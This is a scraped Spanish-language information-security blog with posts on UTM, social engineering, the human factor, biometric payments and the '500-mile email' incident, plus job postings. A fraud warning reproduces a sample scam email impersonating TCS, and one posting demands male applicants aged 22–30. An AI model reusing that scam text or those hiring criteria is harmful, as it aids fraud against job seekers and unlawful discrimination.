Facilitar en gran medida la tarea de abordar diversas amenazas: Existen amenazas mixtas, que son el resultado de la combinación de varios tipos de malware y ataques dirigidos a partes diferentes de la red de forma simultánea, evitar este tipo de ataques puede resultar difícil cuando se utilizan distintos productos y proveedores para cada tarea de seguridad específica, ya que cada aspecto tiene que administrarse y actualizarse de forma individual para poder hacer frente a las últimas formas de malware y cibercrimen. La creación de un único punto de defensa y el uso de una sola consola permiten a las soluciones UTM facilitar en gran medida la tarea de abordar diversas amenazas.

Desventaja

Un único punto de defensa que proporciona un dispositivo UTM también constituye un único punto de falla. Por este motivo, muchas organizaciones optan por complementar su dispositivo UTM con un segundo perímetro basado en software para detener cualquier malware que logre superar el firewall UTM.

EL ARTE DE LA INTRUSION – COMO SER UN HACKER O EVITARLOS (edición en español).

2018-01-12T09:13:00.001-04:00

Autores: Kevin Mitnick y William Simon

KEVIN D. MITNICK es un célebre hacker que ha “enderezado su camino” y ahora consagra sus considerables habilidades a ayudar a empresas, organizaciones y organismos gubernamentales a protegerse de los tipos de ataques descritos en este libro y en su anterior bestseller, The Art of Deception (traducido al español como El Arte del Engaño).

El Arte de la Intrusión ha sido incluso más difícil de escribir que nuestro último libro El Arte del Engaño. En lugar de utilizar nuestros talentos creativos combinados para desarrollar historias y anécdotas que ilustren los peligros de la ingeniería social y qué pueden hacer las empresas para mitigar los riesgos, Bill Simón y yo hemos trabajado principalmente sobre las entrevistas de ex hackers, phreakers y hackers convertidos a profesionales de la seguridad.

Queríamos escribir un libro que fuera a un mismo tiempo una novela de misterio y un manual que abra los ojos a las empresas y les ayude a proteger su información confidencial y sus recursos informáticos. Creemos firmemente que sacando a la luz las metodologías y las técnicas más comunes que utilizan los hackers para penetrar en sistemas y redes, podemos ejercer influencia en todo el ámbito para abordar correctamente los riesgos y las amenazas que suponen estos adversarios audaces.

Indice del contenido:

Intrusión en los casinos por un millón de dólares - Cuando los terroristas entran por la puerta - Los hackers de la prisión de Texas - Policías y ladrones - El Robin Hood hacker - La sabiduría y la locura de las auditorías de seguridad - Su banco es seguro, ¿no? - Su propiedad intelectual no está segura - En el continente - Ingenieros sociales: cómo trabajan y cómo detenerlos - Anécdotas breves.

Dascargar (2.2 MB)

Profesional para el área de Infraestructura (soporte Aplicaciones) en Consorcio Credicard.

2018-01-12T08:50:00.001-04:00

1. EDUCACIÓN:

Licenciado/Ingeniero en computación, sistemas o carrera afín.

2. CONOCIMIENTOS
Habilidades en implantación y administración de servidores de aplicación (JBoss, Tomcat y WAS),
Servidores Web (Apache, IIS, GlasFish).
Conocimiento de sistemas operativos Unix, linux y Windows.
Deseable experiencia en implementación y administración de servidores de correo.

3. ACTITUDES Y VALORES:

· Actitudes: Proactivo, innovador, foco en el cliente, liderazgo, sentido de pertenencia.

· Valores: Seguridad, responsabilidad, disciplina, digno de confianza

Si quiere postularse, puede remitir su CV a la dirección de correo ruben.sojo@credicard.com.ve y gilbey.serrano@credicard.com.ve

Oferta de Trabajo- Seguridad Informática- ESET Venezuela

2017-08-24T10:00:00.001-04:00

ESET de Venezuela, empresa en el área de Seguridad de la Información está en la búsqueda de personal para los siguientes 2 cargos disponibles:

1.- Gerente Comercial-Channel manager

· Descripción del empleo:

· El Gerente Comercial es el principal punto de contacto entre ESET y la red de canales de soporte y comercialización de sus productos. Este rol requiere de un individuo proactivo, dinámico, que sea capaz de manejar un gran número de actividades en simultáneo.

· Experiencia y aptitudes deseadas

REQUISITOS:
Residenciado en Caracas
Vehículo propio ( preferiblemente)

· * Individuo con perfil multifuncional con habilidades técnicas, comerciales y de marketing
* Título de grado en Negocios y/o Marketing, o título de grado en Sistemas de la Información, o experiencia equivalente en posicionales similares
* Habilidades interpersonales altamente desarrolladas tanto personalmente, telefónicamente como por medios de comunicación digitales como el correo electrónico
* Habilidades para el trabajo en equipo en ventas y proyectos, manejo del tiempo y organización
* Habilidades para cerrar negocios alcanzando al mismo tiempo un alto nivel de satisfacción del cliente
* Conocer y comprender las tendencias en seguridad de la información y otros temas técnicos relacionados
* Actitud profesional y cortes, respetuosa, para reflejar el compromiso de ESET con la calidad de sus productos y la relación con sus canales
* Creatividad comercial, seguimiento y creación de políticas comerciales, y capacidad para manejar todo el ciclo de ventas
* Background técnico en sistemas operativos, redes informáticas y seguridad de la información
* Idiomas: Español e Inglés ( preferiblemente).

Principales responsabilidades:

· Trabajar en forma cercana a los canales para crear y cerrar negocios.

· Reclutar nuevos canales.

· Proveer asistencia y cerrar negocios.

· Calificar prospectos y coordinar el acercamiento a los mismos con los canales.

· Brindar presentaciones comerciales y/o técnicas en demostraciones con clientes, eventos y/o conferencias.

· Gestionar la relación comercial con clientes de las cuentas claves, lo cual implica ser interlocutor entre la compañía y el cliente a fin de establecer acuerdos en respuesta a los planteamientos, necesidades o posicionamientos en el cliente.

· Diseñar soluciones eficientes para satisfacer las necesidades y/o requerimientos de clientes.

· Desarrollar ofertas de venta, evaluarlas conjuntamente con el cliente en los casos que se requiere.

· Documentar la participación en procesos licitatorios que son de interés para la compañía.

· Identificar oportunidades de venta y servicios con los clientes actuales y nuevos clientes.

· Construir la relación comercial con los clientes internos y externos.

· Elaborar y coordinar la planificación de nuevas estrategias siempre que sea necesario, con el objeto de abordar de manera efectiva cada caso potencial de negocio.

· Desarrollar planes individuales de venta, con el propósito de concretar oportunidades de negocio que son atípicas y que vienen a ser un valor adicional para la compañía dado que representa la posibilidad de expansión a otras áreas de servicios.

· Efectuar análisis de oportunidades a fin de identificar nuevos servicios, productos y aplicaciones a ofrecer.

· Efectuar la gestión en la etapa de pre-venta: Levantamiento de información, analizar las solicitudes y necesidades planteadas por el cliente a fin de elaborar la propuesta de negocios.

· Coordinar a nivel administrativo y operativo los servicios implantados en clientes.

· Proveer al departamento de administración la información necesaria para la elaboración de la facturación correspondiente a cada servicio.

· Elaborar y exponer las presentaciones que sustentas las ofertas de servicio, para lo cual puede apoyarse en otras unidades funcionales del negocio.

· Realizar cualquier otra actividad inherente a su cargo de acuerdo a la normativa de la Empresa.

PAQUETE SALARIAL
Sueldo Base A convenir
Bono de productividad en base a comisiones de ventas
Seguro HCM
Bono de Alimentación

Interesados enviar su resumen curricular a la siguiente dirección empleo@eset.com.ve

2.- Analista de Soporte Técnico nivel 2:

REQUISITOS:
Sexo masculino
edad entre 22 y 30 años
Ingeniero o TSU en el área de sistemas, informática o electrónico
Residenciado en Caracas
Vehículo propio ( preferiblemente)

CONOCIMIENTOS EN:
Manejo de protocolo TCP/IP
Conocimientos sobre protocolos de red
Conocimiento de VPN
Manejo de O.S Windows Server, 10, 8, 7 y Linux
Conocimientos deseados de:
- Normas y estándares de Seguridad de la información
- Elaboración de políticas y procedimientos
- Control de Acceso Lógico
- Protección de perímetro: Firewalls, Proxys, IDS/IPS.
- Herramientas para Control de Contenido
- Administración de Consolas Antivirus y Anti-Spam
- Capacidad para documentar procesos, incidentes e informes técnicos.

PAQUETE SALARIAL
Sueldo Base A convenir
Bono de productividad
Seguro HCM
Bono de Alimentación

Interesados enviar su resumen curricular a la siguiente dirección empleo@eset.com.ve

Buscamos Especialista en Seguridad Información

2017-02-16T11:25:00.002-04:00

Se requieren 2 especialistas de Seguridad de la Información para DaycoHost. Contactar a terrerosv@daycohost.com y enviar resúmen curricular

Falsa oferta de empleo por ciberdelincuentes en Internet

2016-12-16T17:58:00.000-04:00

Gancho utilizado: Te ofrecen el trabajo ideal para trabajar en el extranjero. Buenas condiciones laborales y buen salario. ¡No lo puedes rechazar!

¿Dónde está el fraude?: Antes o después, acaban solicitando el ingreso de una cantidad de dinero bajo excusas como: gastos de gestión del contrato, gestión del billete de avión, etc.

Correo que te llega a tu cuenta, con el anexo donde te solicitan que deposites $683.00

TATA CONSULTANCY SERVICES (TCS)

North American Headquarters -

No.101 Park Avenue, 26th Floor

New York, NY 10178, USA

E-mail: hr@tcsplacement.com

Tel: +1 707 370 5165

Date: 16 - 12 - 2016

Dear, Applicant

Warm greetings from the entire management of Tata Consultancy Services ( TCS ).

At TCS, we believe that our people are our competitive edge. If you have the passion for excellence and seek a fulfilling career.

We are committed to innovative growth, through our personal passion, reinforced by a professional mindset, creating value for all those we touch, by changing the way the world works.

Join us and attend our in person interview for a career opportunity that will take you further than you ever imagined.

Enclosed file is your employment interview call letter .

We await your response.

Best wishes!!,

Dr. Karem Orlando Jr.

(Sr. Human Resource Manager)

Human Resource - Tata Consultancy Services

.......................................................................................................

Disclaimers: This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

.......................................................................................................

Zona de los

Vacante en Banco Occidental de Descuento (BOD)

2016-12-07T16:25:00.001-04:00

En el Banco Occidental de Descuento (BOD) se requiere de un especialista en seguridad de la información para desempeñarse en el área de monitoreo de seguridad y gestión de incidentes (SOC).

Entre las habilidades requeridas al cargo se destacan:

· Disponibilidad inmediata

· Ingeniero, TSU o Licenciado en Computación o carreras afines

· Graduado o en primeros años de experiencia laboral.

· Interés de aprendizaje en el área de seguridad informática

- TSU informática / computación, sistemas o afín.

- Conocimientos o hab. básicas: Herramientas de Monitoreo y gestión de eventos (SIEM, Tívoli, Remedy).

- Conocimientos y habilidades de programación en Java; .net; C++

- Conocimientos en Sistemas de Servidores Windows,

- Conocimientos Básicos de Servidores Unix,

- Conocimientos Básicos de Servidores Linux,

- Conocimientos Básicos de Servidores Z/OS

- Conocimientos Básicos de Mainframes IBM

· Deseable dominio de idioma inglés (no limitativo)

· Deseable dominio de redes (no limitativo)

· Deseable 1 año de experiencia en áreas de monitoreo (transaccional, seguridad, tecnológico) (no limitativo)

Aptitudes analíticas:

- Solución de problemas

- Pensamiento analítico

- Metódico

Cualidades personales:

- Responsabilidad

- Sociabilidad

- Integridad y honestidad

- Proactivo


Interesados escribir a atavara@bod.com.ve

Búsqueda en Venezuela de talentos en Seguridad de la Información

2016-11-29T15:51:00.001-04:00

LOGINTEL C.A., empresa enfocada al área de soluciones de seguridad informática, con representación exclusiva para Venezuela de las marcas ESET, se encuentra en la búsqueda de personal para desarrollarse como Especialista de Seguridad Informática.

Entre las habilidades a desarrollar en el cargo de encuentran: Instalación y configuración de soluciones de seguridad que contemplan protecciones antivirus, firewall, control y gestión de redes, políticas de seguridad, cifrado de datos, filtrado de correos, gestión de políticas de seguridad, gestión de dispositivos móviles (BYOD) y comunicaciones corporativas.

Disponemos de un programa de entrenamiento certificación para las habilidades requeridas. No se exigen conocimientos previos.

Requisitos:

· Disponibilidad inmediata

· Ingeniero, TSU o Licenciado en Computación o carreras afines

· Recién graduado o en primeros años de experiencia laboral.

· Buena presencia, responsable y proactivo

· Interés de aprendizaje en el área de seguridad informática

· Deseable conocimiento en plataforma Unix/Linux (no restrictivo)

· Deseable dominio de idioma inglés (no restrictivo)

· Deseable dominio de redes o certificación Cisco (no restrictivo)

Beneficios:

· Remuneración competitiva

· Facilidades y flexibilidad de trabajo

· Grato ambiente

· Entrenamiento

· Contratación inmediata

· Oportunidad de relacionarse

Las personas interesadas pueden enviar su currículum a empleo@eset.com.ve Para cualquier información también pueden contactarnos al 0212-9064241/4233.

Ingeniería social

2016-11-18T17:29:00.006-04:00

Ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o delincuentes informáticos, para obtener información, acceso o privilegios en sistemas de información que les permitan realizar algún acto que perjudique o exponga la persona u organismo comprometido a riesgo o abusos.

El principio que sustenta la ingeniería social es el que en cualquier sistema "los usuarios son el eslabón débil". En la práctica, un ingeniero social usará comúnmente el teléfono o Internet para engañar a la gente, fingiendo ser, por ejemplo, un empleado de algún banco o alguna otra empresa, un compañero de trabajo, un técnico o un cliente. Vía Internet o la web se usa, adicionalmente, el envío de solicitudes de renovación de permisos de acceso a páginas web o memos falsos que solicitan respuestas e incluso las famosas cadenas, llevando así a revelar información sensible, o a violar las políticas de seguridad típicas. Con este método, los ingenieros sociales aprovechan la tendencia natural de la gente a reaccionar de manera predecible en ciertas situaciones, –por ejemplo proporcionando detalles financieros a un aparente funcionario de un banco– en lugar de tener que encontrar agujeros de seguridad en los sistemas informáticos.

La ingeniería Social está definida como un ataque basado en engañar a un usuario o administrador de un sitio en la internet, para poder ver la información que ellos quieren.

Se hace para obtener acceso a sistemas o información útil.

Los objetivos de la ingeniería social son fraude, intrusión de una red, espionaje industrial, robo de identidad, etc.

Quizá el ataque más simple pero muy efectivo sea engañar a un usuario llevándolo a pensar que un administrador del sistema está solicitando una contraseña para varios propósitos legítimos. Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseñas o información de tarjeta de crédito, con el motivo de "crear una cuenta", "reactivar una configuración", u otra operación benigna; a este tipo de ataques se los llama phishing (se pronuncia igual que fishing, pesca). Los usuarios de estos sistemas deberían ser advertidos temprana y frecuentemente para que no divulguen contraseñas u otra información sensible a personas que dicen ser administradores. En realidad, los administradores de sistemas informáticos raramente (o nunca) necesitan saber la contraseña de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podría no ser necesario –en una encuesta realizada por la empresa Boixnet, el 90 % de los empleados de oficina de la estación Waterloo de Londres reveló sus contraseñas a cambio de un bolígrafo barato–

Otro ejemplo contemporáneo de un ataque de ingeniería social es el uso de archivos adjuntos en correos electrónicos, ofreciendo, por ejemplo, fotos "íntimas" de alguna persona famosa o algún programa "gratis" (a menudo aparentemente provenientes de alguna persona conocida) pero que ejecutan código malicioso (por ejemplo, usar la máquina de la víctima para enviar cantidades masivas de spam). Ahora, después de que los primeros correos electrónicos maliciosos llevaran a los proveedores de software a deshabilitar la ejecución automática de archivos adjuntos, los usuarios deben activar esos archivos de forma explícita para que ocurra una acción maliciosa. Muchos usuarios, sin embargo, abren casi ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque.

La ingeniería social también se aplica al acto de manipulación cara a cara para obtener acceso a los sistemas informáticos. Otro ejemplo es el conocimiento sobre la víctima, a través de la introducción de contraseñas habituales, lógicas típicas o conociendo su pasado y presente; respondiendo a la pregunta: ¿Qué contraseña introduciría yo si fuese la víctima?

La principal defensa contra la ingeniería social es educar y entrenar a los usuarios en el uso de políticas de seguridad y asegurarse de que estas sean seguidas.

Uno de los ingenieros sociales más famosos de los últimos tiempos es Kevin Mitnick. Según su opinión, la ingeniería social se basa en estos cuatro principios:

Todos queremos ayudar.
El primer movimiento es siempre de confianza hacia el otro.
No nos gusta decir No.
A todos nos gusta que nos alaben.

Técnicas más comunes de engaño de la Ingeniería Social

Existen diversos métodos que se utilizan para obtener información confidencial o reservada, entre los cuales podemos hablar de:

Obtención de Información: búsqueda de información que puede ser utilizada para penetrar en un sistema. Los atacantes crean un vínculo de confianza para animar al usuario a compartir información. La obtención de información puede utilizarse para atacar la seguridad lógica y perimetral de la Organización.
Piggybacking: es un método muy antiguo para realizar infiltraciones, esta técnica consiste en seguir a una persona sobre una zona de acceso restringido. También se opta por pretender suplantar a una persona para obtener el acceso legítimo de otra persona.
Phishing: es una de las técnicas más conocidas para realizar un ataque de ingeniería social. Es el engaño de un correo electrónico que ínsita a visitar una web mediante enlaces que suplantan algún sitio oficial. Es normal recibir correos falsos de entidades bancarias y gubernamentales; obteniendo así datos personales que pueden terminar en un fraude.
Las cartas nigerianas: se conocen así a los mensajes falsos que nos llegan invitándonos o a conseguir una gran cantidad de dinero a cambio de un pequeño desembolso inicial. Un caso frecuente es el de la herencia multimillonaria que ha tenido la gentileza de compartir con nosotros. Otra modalidad es el premio de lotería con el que hemos sido agraciados sin ni siquiera haber jugado.
Ataques por teléfono: realizar llamadas haciéndose pasar por otra persona, como un técnico de soporte o un empleado de la misma organización.
Explotar la sexualidad: un ingeniero social puede ganar la confianza al mostrarse atractivo para un individuo en la sociedad, e incluso salir con la persona y el desarrollo de una relación íntima. A veces, un coqueteo hará el truco, y el objetivo será proporcionar la información sin problemas de seguridad perimetral.

La importancia del factor humano en la seguridad

2016-11-15T17:21:00.000-04:00

La implantación de unas adecuadas medidas de seguridad informática exige contemplar aspectos técnicos, organizativos y legales, no obstante, en muchas ocasiones se presta muy poca atención a la importancia del factor humano en la seguridad informática.

Las personas representan el eslabón más débil dentro de la seguridad informática a diferencia de los ordenadores, las personas pueden no seguir las instrucciones exactamente tal y como fueron dictadas, además, pueden llevar a cabo acciones que provoquen un agujero de seguridad en la red de la organización como por ejemplo la instalación de software malicioso en su ordenador, revelación de información sensible a terceros, entre otros.

Es fundamental, por lo tanto, contemplar el papel de las personas y su relación con los sistemas y redes informáticas de la organización. Además, la disponibilidad en Internet de todo tipo de herramienta y programas, así como la documentación necesaria para su instalación y configuración ha venido a complicar la situación para los responsables de informática de las organizaciones, ya que ahora la "tentación" se encuentra a un simple clic de distancia

En definitiva, un principio básico a tener en cuenta desde el punto de vista de la seguridad informática es que todas las soluciones implementadas resulta inútiles ante desconocimiento, más 75% de los problemas inherentes a la seguridad se producen por fallos en la configuración de los equipos o debido a un mal uso por partes del personal de la propia organización.

Los principales expertos en materia de seguridad informática ya nos han alertado estos últimos años sobre la necesidad de contemplar el factor humano como uno de los más importante y decisivos a la hora de implementar un buen sistema de gestión de seguridad información.

En palabras de Kevin Mitnick, uno de los crackers más famosos del mundo por conocidas estafas utilizando Ingeniería Social como principal arma y actual dueño de una consultora de seguridad que lleva su nombre: "Usted puede tener la mejor tecnología, Firewalls, sistemas de detección de ataques, dispositivos biométricos, etc. Lo único que se necesita es un llamado a un empleado desprevenido e ingresar sin más. Tienen todo en sus manos".

El propio experto en criptografía y seguridad Bruce Schneier llegaba a afirmar "si piensas que tecnología puede resolver tus problemas de seguridad, entonces no entiendes el problema y no entiendes la tecnología". Es por ello, que la implantación de un Sistema de Gestión de Seguridad Informática debe considerar el factor humano como uno de sus elementos claves, contemplando aspectos como:

Implementación de medidas de seguridad informática.

Adecuada formación y sensibilización de los empleados.

Implicación de los responsables y directivos.

Aprobación de reglamentos internos sobre el uso de herramienta informáticas en la organización.

Cualquier otra medida de aporte positivo

Dentro de las acciones o buenas prácticas a ejecutar se encuentran:

Acuerdos de confidencialidad.

Un acuerdo o contrato de confidencialidad (en inglés non-disclosure agreement o NDA) es un contrato legal entre al menos dos entidades para compartir material confidencial o conocimiento para ciertos propósitos.

Inclusión de la seguridad dentro de responsabilidades contractuales.

Todos los términos y las condiciones del trabajador tienen que reflejar la política de la empresa además de aclarar los siguientes términos:

Todos los empleados, contratistas y terceros a los que se la ha concedido acceso a la información sensible que debe firmar un acuerdo de confidencialidad, ya que no pueden divulgar el acceso a las instalaciones del procesamiento de información.
Las responsabilidades y los derechos de las subcontratas, por ejemplo en relación con toda la legislación de la protección de datos personales.
Las responsabilidades de la clasificación de la información y de la gestión de activos que se encuentran asociados a los Sistemas de Gestión de Seguridad de la Información y los servicios que son utilizados por el trabajador o la empresa subcontratada.
Las responsabilidades de los trabajadores o terceras personas necesarias para maniobrar con la información que reciben las compañías.
Todas las responsabilidades por parte de la empresa para informar al personal, en la que se incluye información utilizada por el trabajo realizado por la organización.
Las responsabilidades se extienden fuera de las hipótesis establecidas por la organización y que se encuentran fuera del periodo normal de trabajo.
Las acciones que se toman si el trabajador o contratista no cumple con todos los requisitos establecidos para la Seguridad de la Información de la organización.

Selección rigurosa del personal.

Según establece la norma ISO 27001 se tienen que llevar a cabo listas de verificación antes de que estén todos los candidatos para el empleo, los contratistas y terceras personas. Se debe encontrar en concordancia con la legislación vigente y la ética, el listado de verificación debe tener en cuenta la privacidad, la protección de todos los datos del personal y el empleo tiene que estar basado en lo siguiente:

La disponibilidad de referencias satisfactorias sobre todas las actitudes, como por ejemplo, una del personal y otra de la empresa.

La comprobación del Curriculum Vitae del candidato.

La confirmación de la certificación académica y profesional.

La empresa tiene que considerar la realización de una comprobación mucho más detallada a lo largo del tiempo, cuando una persona acceda a un puesto de trabajo, con un contrato inicial, teniendo en cuenta los recursos necesarios para tratar la información y en particular se trata de información sensible, es decir, información financiera.

Las funciones y obligaciones de cada una de las distintas personas que tienen acceso a los datos y a los servicios del sistema de información de una organización deberían estar claramente definidas en todo momento.

Estas medidas afectan a los distintos colectivos que puedan tener acceso a los servicios del sistema y red informática de la organización:

Administradores del sistema y de la red informática
Desarrolladores de aplicaciones
Técnicos responsables del mantenimiento de los equipos y de la red informática
Usuarios finales del sistema
Directivos
Personal externo: empresas de servicios que tienen acceso a los recursos informáticos de la organización.

Normas prácticas:

Cada equipo asignado a un puesto de trabajo estará bajo la responsabilidad de uno de los usuarios autorizados en el sistema informático de la organización.

Antes de abandonar el equipo del puesto de trabajo, ya sea temporalmente o bien al finalizar su turno de trabajo, deberá cancelar todas las sesiones activas y conexiones con los servidores de la red corporativa.

Utilizar un protector de pantallas protegido con contraseña. Bloquear la máquina al alejarse de ella.

Impedir que otros usuarios puedan utilizar su identidad para acceder al sistema informático.

No introducir CD-ROMs, USB u otros medios sin la comprobación previa de que no contienen riesgos de ninguna clase.

No se cambiará la configuración del equipo ni se intentará solucionar posibles problemas de funcionamiento. En dicho caso, se deberá comunicar inmediatamente a la persona encargada del mantenimiento de los equipos.

Sólo se utilizarán las herramientas corporativas , quedando prohibida la instalación de cualquier software en las computadoras de la empresa que no haya sido expresamente autorizado.

Discos y documentos con información sensible deberán guardarse bajo llave.

En el caso de impresoras, asegurarse que no queden documentos impresos en la bandeja de salida que contengan datos protegidos u otra información sensible.

Deberá informarse de cualquier incidencia que pudiera afectar a la seguridad de la red informática o al normal funcionamiento del sistema.

Los equipos y medios informáticos de la organización no pueden ser sacados fuera de ésta sin la correspondiente autorización de los responsables.

Se limitará el acceso a Internet solamente a fines profesionales

Uso adecuado de correos electrónicos

La forma de asegurarse que el intercambio de información se lleva a cabo adecuadamente y bajo la protección necesaria, es a través de la elaboración de una política que incluya los medios empleados en esta actividad. En dicha política se debe incorporar:

Los procedimientos definidos para gestionar correctamente los medios utilizados.

Utilización de firma electrónica.

Comprobaciones a través de controles que impidan modificaciones, interpretaciones, duplicados o eliminación de información.

Inspecciones de protección contra el código malicioso.

Metodologías de ingeniería social.

Jornadas de Investigación Ing. UCV - 14 al 18 de Nov.

2016-11-14T17:19:00.002-04:00

La Facultad de Ingeniería de la Universidad Central de Venezuela, comprometida con el desarrollo científico y tecnológico del país, invita a participar en las Jornadas de Investigación y en el Encuentro Académico e Industrial JIFI-EAI 2016.

JIFI-EAI ha sido reconocido como un escenario multidisciplinario para impulsar la difusión y transferencia del conocimiento tecnológico, científico y humanístico, en el área de ingeniería y sus afines. De igual manera, constituye un espacio dialógico para intercambiar experiencias tanto de los organismos del Estado como del sector privado en relación con los productos y logros de las principales disciplinas de la ingeniería, búsqueda de soluciones a la diversidad de problemas nacionales en las áreas de su competencia y desarrollo de estrategias para la formación del ser humano.

http://jifi-eai.ing.ucv.ve

Biometría, ¿el futuro de los pagos seguros?

2016-08-12T16:38:00.000-04:00

A pesar de la comodidad y la sencillez de la seguridad biométrica, por no mencionar los millones que podría ahorrarle a los bancos al evitar los fraudes online, los profesionales de seguridad informática plantearon varias preocupaciones en torno a la seguridad y la privacidad de los pagos biométricos.

Una de las principales preocupaciones es que la medición biométrica se está utilizado como equivalente a una contraseña o clave de acceso, en lugar de usarse como una prueba de identidad que luego se complemente con una contraseña o PIN para autenticar dicha información. Esto plantea la preocupación de que el límite entre la delincuencia física y la de la información comience a desdibujarse, y algunos especulan que la biometría podría abrir las puertas a espantosos ataques dirigidos.

Esto no es una exageración. Hace algunos años, el criptógrafo japonés Tsutomu Matsumoto se hizo famoso por engañar los sistemas de seguridad de huellas dactilares utilizando un “dedo de goma”copiado directamente desde el dedo objetivo.

También se descubrieron algunas fallas en la tecnología biométrica de pago móvil. En septiembre, unos investigadores revelaron que era posible engañar la tecnología TouchID de Apple usando huellas digitales falsas y también se hizo una prueba de concepto similar con el escáner de huellas digitales del Galaxy S5 de Samsung. Mientras tanto, algunos usuarios se quejaron de los elevados índices de reconocimiento erróneo y muchos se preguntaron si efectivamente era posible copiar una huella desde una fotografía.

Si a esto le sumamos la posibilidad de que roben los datos biométricos y el peligro subsecuente del robo de identidad, queda claro que los pagos seguros biométricos aún tienen un largo camino por recorrer. Sin embargo, prácticamente no cabe duda de que esta tecnología (y la idea de poder “conectarse uno mismo” en esta era de la Internet de las Cosas) llegó para quedarse. Esperamos que estés preparado.

Pasantías en Seguridad de la Información en Caracas - Venezuela

2016-08-12T16:22:00.003-04:00

¿Necesitas hacer tus pasantías de pregrado?

¿Te gustaría tener tu primer empleo y ganar experiencia?

¿Te gusta el área de la Seguridad de la Información?

¿Te gustaría aprender de las herramientas y metodologías aplicadas en seguridad más avanzadas de la actualidad?

Si dos o tres respuestas son positivas, entonces te esperamos en nuestra empresa especializada en Seguridad de la información, Seguridad Informática y Seguridad Electrónica, tenemos plazas para 6 pasantes en InteliCorp en Caracas - Venezuela.

Envía tu síntesis curricular al correo rrhh@intelicorps.com

Requisitos:

- Ser puntual,

- Ser ordenad@,

- Tener orientación al logro

- Motivación

- Ser eficiente

- Ser eficaz

- Cumplimiento de objetivos

- Centrad@s

- Capacidad de planificación

- Tener propósitos de vida

- Tener capacidad de adaptación

- Tener capacidad de hacer varias tareas

No todos son necesarios, pero si no los tienes, aquí te los enseñamos para que tu futuro sea mejor.

Disciplina del éxito

Seguridad Informática

📧 El correo que no viajaba más de 500 millas

📧 El correo que no viajaba más de 500 millas

Una lección real sobre gestión de incidentes (ISO/IEC 27001 – 27002)

Un usuario abrió un ticket diciendo algo aparentemente absurdo:No puedo enviar correos electrónicos a más de 500 millas de distanciaEl administrador de sistemas pensó lo que muchos pensaríamos: “el correo no tiene distancia”.Sin embargo, el usuario insistió… y tenía razón.

🔍 El incidente

Las pruebas confirmaron el problema:Correos a servidores cercanos: ✅ entregadosCorreos a servidores lejanos: ❌ fallabanDías antes, el servidor de correo (Sendmail) había sido actualizado.La nueva configuración por defecto redujo el timeout de conexión a 3 milisegundos.

⚡ Cuando la física entra en juego

🔗 Relación con ISO/IEC 27001 y 27002

Este caso es un ejemplo perfecto de gestión de incidentes, aunque no haya existido un ciberataque.

📌 Detección y reporte

ISO 27002 – Control 5.24El incidente fue detectado gracias a un reporte de usuario, una fuente clave que nunca debe subestimarse.

📌 Evaluación del incidente

ISO 27002 – Control 5.25Un evento que parecía trivial afectaba directamente la disponibilidad del servicio de correo.

📌 Análisis y respuesta

ISO 27002 – Control 5.26La causa raíz no fue una falla de red ni un ataque, sino un cambio mal controlado en la configuración.

📌 Aprendizaje y mejora

ISO 27002 – Control 5.27El verdadero valor del incidente está en lo aprendido: Revisar parámetros críticos tras cambios Realizar pruebas post-actualización Documentar impactos no evidentes

🎯 Lección clave

No todos los incidentes de seguridad vienen de ataques. Algunos nacen de una mala configuración… y otros nos recuerdan que incluso la tecnología obedece a las leyes de la física.

La gestión de incidentes no consiste solo en restaurar servicios, sino en entender por qué fallaron y evitar que vuelva a ocurrir.

🔐 Ciberseguridad: un ecosistema, no una sola herramienta

🌐🤖 La nueva frontera en Ciberseguridad: proteger la Inteligencia Artificial 🛡️

Lecciones de Ciberseguridad: El Caso del Mayordomo que Traicionó al Papa

Biggest Mysteries to be Solved: A Personal Take 🕵️‍♀️✨

Por qué estos misterios me fascinan 💡🔎

Combinación de ciberseguridad e inteligencia artificial (IA)

Historia de Marcus Hutchins

¿Conoces la historia de Marcus Hutchins?

El hacker que salvo el Internet

Seguridad de la Información

¿Que es un #Ingenier@ de #Ciberseguridad?

Phishing scam: "Recomendación lucrativa de empleo" de Recursos Humanos

Ataque de #phishing que uso a #GoogleDocs y #Gmail como el anzuelo

Criptosecuestro ¿Qué es? y ¿Qué no es? ¿Cómo puedo protegerme?

¿Qué es la gestión unificada de amenazas (UTM)?

EL ARTE DE LA INTRUSION – COMO SER UN HACKER O EVITARLOS (edición en español).

Profesional para el área de Infraestructura (soporte Aplicaciones) en Consorcio Credicard.

Oferta de Trabajo- Seguridad Informática- ESET Venezuela

Buscamos Especialista en Seguridad Información

Falsa oferta de empleo por ciberdelincuentes en Internet

Vacante en Banco Occidental de Descuento (BOD)

Búsqueda en Venezuela de talentos en Seguridad de la Información

Ingeniería social

La importancia del factor humano en la seguridad

Jornadas de Investigación Ing. UCV - 14 al 18 de Nov.

Biometría, ¿el futuro de los pagos seguros?

Pasantías en Seguridad de la Información en Caracas - Venezuela

Un usuario abrió un ticket diciendo algo aparentemente absurdo:
No puedo enviar correos electrónicos a más de 500 millas de distancia
El administrador de sistemas pensó lo que muchos pensaríamos: “el correo no tiene distancia”.
Sin embargo, el usuario insistió… y tenía razón.

Las pruebas confirmaron el problema:
Correos a servidores cercanos: ✅ entregados
Correos a servidores lejanos: ❌ fallaban
Días antes, el servidor de correo (Sendmail) había sido actualizado.
La nueva configuración por defecto redujo el timeout de conexión a 3 milisegundos.

ISO 27002 – Control 5.24
El incidente fue detectado gracias a un reporte de usuario, una fuente clave que nunca debe subestimarse.

ISO 27002 – Control 5.25
Un evento que parecía trivial afectaba directamente la disponibilidad del servicio de correo.

ISO 27002 – Control 5.26
La causa raíz no fue una falla de red ni un ataque, sino un cambio mal controlado en la configuración.

ISO 27002 – Control 5.27
El verdadero valor del incidente está en lo aprendido:

Revisar parámetros críticos tras cambios

Realizar pruebas post-actualización

Documentar impactos no evidentes